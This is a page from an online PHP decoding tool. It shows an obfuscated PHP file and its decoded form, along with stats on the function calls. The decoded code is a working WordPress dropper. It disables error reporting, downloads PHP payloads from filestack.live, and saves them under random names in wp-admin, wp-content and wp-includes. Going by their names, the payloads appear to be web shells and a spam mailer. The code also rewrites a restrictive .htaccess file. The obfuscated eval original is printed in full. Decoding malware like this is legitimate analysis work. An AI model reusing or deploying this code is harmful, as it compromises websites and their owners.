Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $Fhqev = 'ba'.'se6'.'4'.'_deco'.'d'.'e'; $PKnBU = 'st'.'r'.'_'.'rot1'.'3'; $XcOyA = ..

Decoded Output download

 error_reporting(0); $p_olux = str_replace("../", "", "./../../../wp-admin/QsEqeGXu7CF.php"); $p_mailer = str_replace("../", "", "./../../../wp-content/1nNMijOWyzG.php"); $p_xleet = str_replace("../", "", "./../../../wp-includes/Low1EJv8f6r.php"); $root = str_replace("../", "", "./../../../"); function http_get_contents($url){$codex = file_get_contents($url);if (empty($codex)){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);curl_setopt($ch, CURLOPT_TIMEOUT, 60);curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);$urlPage = curl_exec($ch);curl_close($ch);return($urlPage);}else {return $codex;}} function save($path, $source){ if(function_exists("file_put_contents")){ file_put_contents($path, $source); }else { fwrite(fopen($path,"w"), $source); } } function read($path){ if(function_exists("file_get_contents")){ $rr = file_get_contents($path); }else { $rr = stream_get_contents(fopen($path, "r")); } return $rr; } if(!file_exists($p_olux)) { $olux = http_get_contents("http://filestack.live/5de9c03400251a73ad64a272db83fab0.htm"); if(preg_match("/<\?php/", $olux)){ save($p_olux, $olux); }  } if(!file_exists($p_xleet)) { $xleet = http_get_contents("http://filestack.live/2995e3adc0c914b5a67cc9c6fb40ad73.htm"); if(preg_match("/<\?php/", $xleet)){ save($p_xleet, $xleet); }  } if(!file_exists($p_mailer)) { $mailer = http_get_contents("https://filestack.live/79f37cf98ac7d864a573c96fd19390ba.htm"); if(preg_match("/<\?php/", $mailer)){ $mailer = str_replace("xxxxxxxxxxxxxxxxxxxxxxx", "16GOmdo3y2Z", $mailer); save($p_mailer, $mailer); }  } save($root."wp-includes/index.html", "<!DOCTYPE html><title></title>"); $htx = strtolower(read($root.".htaccess")); if(preg_match("/deny(.*)from(.*)all/", $htx) || preg_match("/order(.*)allow(.*)deny/", $htx)) { $htx = "<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php\$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>"; chmod($root.".htaccess", 0644); save($root.".htaccess", $htx); } 

Did this file decode correctly?

Original Code

<?php $Fhqev = 'ba'.'se6'.'4'.'_deco'.'d'.'e'; $PKnBU = 'st'.'r'.'_'.'rot1'.'3'; $XcOyA = 's'.'trrev'; $TPyem = 'gzu'.'ncompress'; ini_set('display_errors', 0); ini_set('log_errors', 0); error_reporting(0); eval($TPyem($XcOyA($PKnBU($Fhqev('JPfixx//E4jUy2c+w9saNXaQ+UVuyX+C3wfGpcR8SK6cR7HnieQTKH7BQEbDzs4M863eozoYM/nzGcTD5zx5vwAkk+gLaPhy8GaBL715xe4ucX/mxPV9tbGvyA/lrZNjMFc8yTtNnifeXRMKtkQngJJLMYqwVmIIO60WlPTy8WK2IW/WUgrk4DQmB7APx+AaRoOmS+MJ4pZXTzO+YZPJwCB0P/ZMMs4QiCJmMVo3SkfGsm9TR0KWCzicp6l4svjFiLLsuW4B+bz77d72e7yCxyQtWPCUV4dp1MLjFuUHmR67DKCzeeqh3v7VP6kBl2m62r0tE/9fH8LXsBXYKF6QQgZyaeu1Q25bsjrtm65rLg7UQF91RLesO3rpULPKG/r7YoSuXqtot462Gk2i/w86IJ+u0GBHeDhJo3Ejd9haczauyCqKlzE3eprosmmOi5pGG3KS6+9PzCmKRs4pvgqSirRRXed/72hzuhaGMrec8Vd1PPy4pbBcxUzCHqLswXi1rAatBh1pwqzWpVeN6kgbYBmrYD0cc++iDHNpJZav0wmqK8Os95zBDDKnbDFlMZM5643ipSHIrKFJZY0CFWoj7lww7X44RMi9Ml+r19KJREXhW7RGHcKBhijSOwUHsZrW0o5WxSSHrDEaeIQBrkBokz+sDgOV41bqXq6U9ZNUi8ZEdfBAvU+IDY2EREwZV7rjIVrvgfByGVjz887wOoHZU8GGZMZs0YNv9FoVsxTvSRkmKNTlMFXEfhGcXGaDvukR0avtLpUz0mr742mL5S545TSuOIztaq8djJqGnwMdeo4TuOtjf3305HXu+3CP9juN7ATiLkFqX9XBvGd+nDxr7DHxBK+NG9e+U/E/jm0Qj0cZRNwP579hhp+6HDuV0FrwQSBya+97043MWuiKBkT8p/O90N4n9BlSsOMpIzDOuR0bpiJXNPdkAb4LPYh3Cuk9lMvHQIUToAr7n+QscUsEiFd5eXWtL1nQuabMZqdYGCwEkRYglWPwEnFBT0SS3RbCLh8/nUpMIazOAUqKCVJmJ3MxjHsh3rv+np+5vo26MneswmPCVYVZnpjFGFhRRkeLpnJ/u0jn9fF/nMh9b0SWDDnp1vxMlpv8WgMrWFozXW4QxfSYyBvwVKvElOlXA6MV65kosoSnFKdPRZgF2rVs9vT7vLGQyG4lAnk+n7/mjlVSk+WNYQyyEY9aaraY1OCG4SdEw2Xg+JvmxDuxm4eKK/0QONpmDUiNnGs='))))); ?>

Function Calls

strrev 1
ini_set 2
str_rot13 1
gzuncompress 1
base64_decode 1
error_reporting 1

Variables

$Fhqev base64_decode
$PKnBU str_rot13
$TPyem gzuncompress
$XcOyA strrev

Stats

MD5 ff0fed6033957653eeddd9e039d149d2
Eval Count 1
Decode Time 54 ms